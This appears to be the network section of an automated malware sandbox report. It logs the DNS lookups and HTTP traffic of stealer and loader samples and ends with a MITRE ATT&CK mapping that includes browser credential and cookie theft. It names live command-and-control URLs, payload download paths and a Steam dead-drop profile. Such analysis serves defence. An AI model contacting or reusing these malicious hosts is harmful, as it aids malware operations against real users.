http://185.215.113.206/c4becf79229cb002.php

2d902fdd78.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBK
Host: 185.215.113.206
Content-Length: 1039
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/c4becf79229cb002.php

2d902fdd78.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJDBGDHIIDAEBFHJJDBF
Host: 185.215.113.206
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 11 Nov 2024 08:40:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

197.87.175.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.87.175.4.in-addr.arpa

IN PTR

Response
DNS

nw-umwatson.events.data.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

nw-umwatson.events.data.microsoft.com

IN A

Response

nw-umwatson.events.data.microsoft.com

IN CNAME

blobcollector.events.data.trafficmanager.net

blobcollector.events.data.trafficmanager.net

IN CNAME

onedsblobprdeus17.eastus.cloudapp.azure.com

onedsblobprdeus17.eastus.cloudapp.azure.com

IN A

20.42.65.92
POST

https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

msedge.exe

Remote address:

20.42.65.92:443

Request

POST /Telemetry.Request HTTP/1.1
Connection: Keep-Alive
Content-Type: application/xml
User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
MSA_DeviceTicket: t=EwDIAlN5BAAUIUShNzVa+rgHy/M+tY/dQyCg+nEAAfNco0s3e0zy/i11/sujWqyDZt9VrWwWvxi1BbwbRGpyV+qqWtX2DJRI+05bbJQHV6RHsalfPstfTjjY+vwnoJcTQr0IOwoeosBrm487U/uWvozn68176bultVF8Xm+q4bjDjmovVzYq+iMD1ye4lE2gTt5VwYra3/TLD1PuLWr8Av0xc3T6AqoMqw/TceSx8F/8wCT4KZlMygfHcleTu+xuMQgv0ZlWrLB1yOwbss4hYeCuXDpVg1bdGFcsAgAdWe/LK8HUebTCzx+So1MQ/C5UaeUFTJKbCQ8BTtlH+557bGVTPhnpdyPcyUA9QjE48fx/v8AiyoX9WErxEUMv5FUQZgAAEBu3Mzk6fGINzprFBC941xGQAQgDrBz5iUF8tWbGkPc4ywdXDCVcjfUYRSerOm7vlExbF4qfLRMzeEb46amLyijvRc7TiY42KtQ9GAYAwBbKJ8d3xvhDG0JottK/Sp6hasJz/1be6hcDbXTMJ1V7GNTEPfsAta33peXM02I3Xkxr/NN7TZ8DnjEjHTFu4/V6jlF3fQ2dRZRLmzjwik8S6i4Q5MJKyzKCaq6IW4RAwIge7wvIlfs5fASl8j3/TVDEIokrhS5bfZkZtQC90reoCxvVN0VBPf0xQRZwNvC3bW0O+233Lu/XvGvue5uEq4u2m4NpupMqJ41Zd41ToKxYssNMab41hydQlFZD8i72BcZWPxF2gnYKG1WGFDis1M8F4b5Kkv5cwcKGxlecTr29TwPQerJB2thK3O2siM7cnfjmijd+8wRCbcTkFKdrz/lt4LYhhR+OmaP1vWuzED0OO+pHkAxqWkWOjDH1iHgAHKxSb3+O7KBM00fXLIsTmryULEpfWAknTC07J6bKOKucC/rFx2LwqM1POgWK+L6ils5grAK3AQ==&p=
Content-Length: 3379
Host: nw-umwatson.events.data.microsoft.com

Response

HTTP/1.1 200 200 OK

Content-Length: 627
Content-Type: text/xml
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Date: Mon, 11 Nov 2024 08:40:59 GMT
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

92.65.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

92.65.42.20.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response

104.21.56.225:443

https://navygenerayk.store/api

tls, http

2n6965.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://navygenerayk.store/api

HTTP Response

200
104.82.234.109:443

https://steamcommunity.com/profiles/76561199724331900

tls, http

2n6965.exe

1.6kB
43.6kB
22
37

HTTP Request

GET https://steamcommunity.com/profiles/76561199724331900

HTTP Response

200
104.21.82.174:443

https://marshal-zhukov.com/api

tls, http

2n6965.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://marshal-zhukov.com/api

HTTP Response

200
185.215.113.43:80

http://185.215.113.43/Zu7JuNko/index.php

http

skotes.exe

2.0kB
2.0kB
19
12

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.43/Zu7JuNko/index.php

HTTP Response

200
185.215.113.206:80

http://185.215.113.206/6c4adf523b719729.php

http

3f60z.exe

11.8kB
5.8kB
29
18

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

404

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

404

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

404

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

404

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

404

HTTP Request

GET http://185.215.113.206/746f34465cf17784/sqlite3.dll

HTTP Response

404

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

404

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

404

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

404

HTTP Request

POST http://185.215.113.206/6c4adf523b719729.php

HTTP Response

404
185.215.113.16:80

http://185.215.113.16/off/random.exe

http

skotes.exe

279.1kB
8.1MB
5816
5808

HTTP Request

GET http://185.215.113.16/luma/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/steam/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/off/random.exe

HTTP Response

200
104.21.56.225:443

https://navygenerayk.store/api

tls, http

c3a87ab7a9.exe

1.1kB
4.8kB
10
9

HTTP Request

POST https://navygenerayk.store/api

HTTP Response

200
104.82.234.109:443

https://steamcommunity.com/profiles/76561199724331900

tls, http

c3a87ab7a9.exe

1.6kB
43.6kB
22
37

HTTP Request

GET https://steamcommunity.com/profiles/76561199724331900

HTTP Response

200
104.21.82.174:443

https://marshal-zhukov.com/api

tls, http

c3a87ab7a9.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://marshal-zhukov.com/api

HTTP Response

200
185.215.113.206:80

http://185.215.113.206/68b591d6548ec281/sqlite3.dll

http

2d902fdd78.exe

48.9kB
1.2MB
845
840

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200

HTTP Request

GET http://185.215.113.206/68b591d6548ec281/sqlite3.dll

HTTP Response

200
142.250.180.4:443

https://www.google.com/async/newtab_promos

tls, http2

chrome.exe

2.5kB
46.1kB
30
45

HTTP Request

GET https://www.google.com/async/ddljson?async=ntp:2

HTTP Request

GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

HTTP Request

GET https://www.google.com/async/newtab_promos
216.58.212.202:443

https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

tls, http2

chrome.exe

2.4kB
7.2kB
15
17

HTTP Request

OPTIONS https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

HTTP Request

POST https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData
216.58.201.110:443

https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0

tls, http2

chrome.exe

3.2kB
47.4kB
37
39

HTTP Request

GET https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0
172.217.16.238:443

https://play.google.com/log?format=json&hasfast=true

tls, http2

chrome.exe

3.5kB
8.9kB
15
16

HTTP Request

POST https://play.google.com/log?format=json&hasfast=true
142.250.187.238:443

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D35%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D35%2526e%253D1

tls, http2

chrome.exe

2.1kB
9.6kB
12
14

HTTP Request

GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D35%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D35%2526e%253D1
216.58.213.1:443

https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx

tls, http2

chrome.exe

4.6kB
153.5kB
73
115

HTTP Request

GET https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx
185.215.113.206:80

http://185.215.113.206/c4becf79229cb002.php

http

2d902fdd78.exe

2.2kB
697 B
9
7

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200
127.0.0.1:9229

2d902fdd78.exe
127.0.0.1:9229

2d902fdd78.exe
127.0.0.1:9229

2d902fdd78.exe
20.42.65.92:443

https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

tls, http

msedge.exe

5.6kB
7.9kB
14
11

HTTP Request

POST https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

67.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

67.31.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

presticitpo.store

dns

c3a87ab7a9.exe

63 B
128 B
1
1

DNS Request

presticitpo.store
8.8.8.8:53

crisiwarny.store

dns

c3a87ab7a9.exe

62 B
127 B
1
1

DNS Request

crisiwarny.store
8.8.8.8:53

fadehairucw.store

dns

c3a87ab7a9.exe

63 B
128 B
1
1

DNS Request

fadehairucw.store
8.8.8.8:53

thumbystriw.store

dns

c3a87ab7a9.exe

63 B
128 B
1
1

DNS Request

thumbystriw.store
8.8.8.8:53

necklacedmny.store

dns

c3a87ab7a9.exe

64 B
129 B
1
1

DNS Request

necklacedmny.store
8.8.8.8:53

founpiuer.store

dns

c3a87ab7a9.exe

61 B
126 B
1
1

DNS Request

founpiuer.store
8.8.8.8:53

navygenerayk.store

dns

c3a87ab7a9.exe

64 B
96 B
1
1

DNS Request

navygenerayk.store

DNS Response

104.21.56.225

172.67.156.62
8.8.8.8:53

scriptyprefej.store

dns

c3a87ab7a9.exe

65 B
130 B
1
1

DNS Request

scriptyprefej.store
8.8.8.8:53

steamcommunity.com

dns

c3a87ab7a9.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

104.82.234.109
8.8.8.8:53

marshal-zhukov.com

dns

c3a87ab7a9.exe

64 B
96 B
1
1

DNS Request

marshal-zhukov.com

DNS Response

104.21.82.174

172.67.160.80
8.8.8.8:53

225.56.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

225.56.21.104.in-addr.arpa
8.8.8.8:53

109.234.82.104.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

109.234.82.104.in-addr.arpa
8.8.8.8:53

174.82.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

174.82.21.104.in-addr.arpa
8.8.8.8:53

43.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

43.113.215.185.in-addr.arpa
8.8.8.8:53

206.113.215.185.in-addr.arpa

dns

74 B
134 B
1
1

DNS Request

206.113.215.185.in-addr.arpa
8.8.8.8:53

16.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

16.113.215.185.in-addr.arpa
8.8.8.8:53

presticitpo.store

dns

c3a87ab7a9.exe

63 B
128 B
1
1

DNS Request

presticitpo.store
8.8.8.8:53

crisiwarny.store

dns

c3a87ab7a9.exe

62 B
127 B
1
1

DNS Request

crisiwarny.store
8.8.8.8:53

fadehairucw.store

dns

c3a87ab7a9.exe

63 B
128 B
1
1

DNS Request

fadehairucw.store
8.8.8.8:53

thumbystriw.store

dns

c3a87ab7a9.exe

63 B
128 B
1
1

DNS Request

thumbystriw.store
8.8.8.8:53

necklacedmny.store

dns

c3a87ab7a9.exe

64 B
129 B
1
1

DNS Request

necklacedmny.store
8.8.8.8:53

founpiuer.store

dns

c3a87ab7a9.exe

61 B
126 B
1
1

DNS Request

founpiuer.store
8.8.8.8:53

scriptyprefej.store

dns

c3a87ab7a9.exe

65 B
130 B
1
1

DNS Request

scriptyprefej.store
8.8.8.8:53

www.google.com

dns

chrome.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.180.4
8.8.8.8:53

ogads-pa.googleapis.com

dns

chrome.exe

69 B
309 B
1
1

DNS Request

ogads-pa.googleapis.com

DNS Response

216.58.212.202

142.250.200.10

216.58.201.106

142.250.178.10

216.58.204.74

142.250.187.202

172.217.16.234

142.250.187.234

172.217.169.74

216.58.213.10

142.250.180.10

172.217.169.10

172.217.169.42

142.250.200.42

142.250.179.234
8.8.8.8:53

apis.google.com

dns

chrome.exe

61 B
98 B
1
1

DNS Request

apis.google.com

DNS Response

216.58.201.110
8.8.8.8:53

106.201.58.216.in-addr.arpa

dns

73 B
173 B
1
1

DNS Request

106.201.58.216.in-addr.arpa
8.8.8.8:53

3.180.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

3.180.250.142.in-addr.arpa
8.8.8.8:53

227.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

227.187.250.142.in-addr.arpa
216.58.212.202:443

ogads-pa.googleapis.com

https

chrome.exe

2.9kB
6.5kB
5
8
8.8.8.8:53

play.google.com

dns

chrome.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

172.217.16.238
8.8.8.8:53

202.212.58.216.in-addr.arpa

dns

73 B
173 B
1
1

DNS Request

202.212.58.216.in-addr.arpa
8.8.8.8:53

110.201.58.216.in-addr.arpa

dns

73 B
173 B
1
1

DNS Request

110.201.58.216.in-addr.arpa
8.8.8.8:53

238.16.217.172.in-addr.arpa

dns

73 B
142 B
1
1

DNS Request

238.16.217.172.in-addr.arpa
8.8.8.8:53

clients2.google.com

dns

chrome.exe

65 B
105 B
1
1

DNS Request

clients2.google.com

DNS Response

142.250.187.238
8.8.8.8:53

clients2.googleusercontent.com

dns

chrome.exe

76 B
121 B
1
1

DNS Request

clients2.googleusercontent.com

DNS Response

216.58.213.1
224.0.0.251:5353

chrome.exe

204 B
3
8.8.8.8:53

238.187.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

238.187.250.142.in-addr.arpa
8.8.8.8:53

1.213.58.216.in-addr.arpa

dns

71 B
138 B
1
1

DNS Request

1.213.58.216.in-addr.arpa
8.8.8.8:53

197.87.175.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

197.87.175.4.in-addr.arpa
8.8.8.8:53

nw-umwatson.events.data.microsoft.com

dns

msedge.exe

83 B
211 B
1
1

DNS Request

nw-umwatson.events.data.microsoft.com

DNS Response

20.42.65.92
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

92.65.42.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

92.65.42.20.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion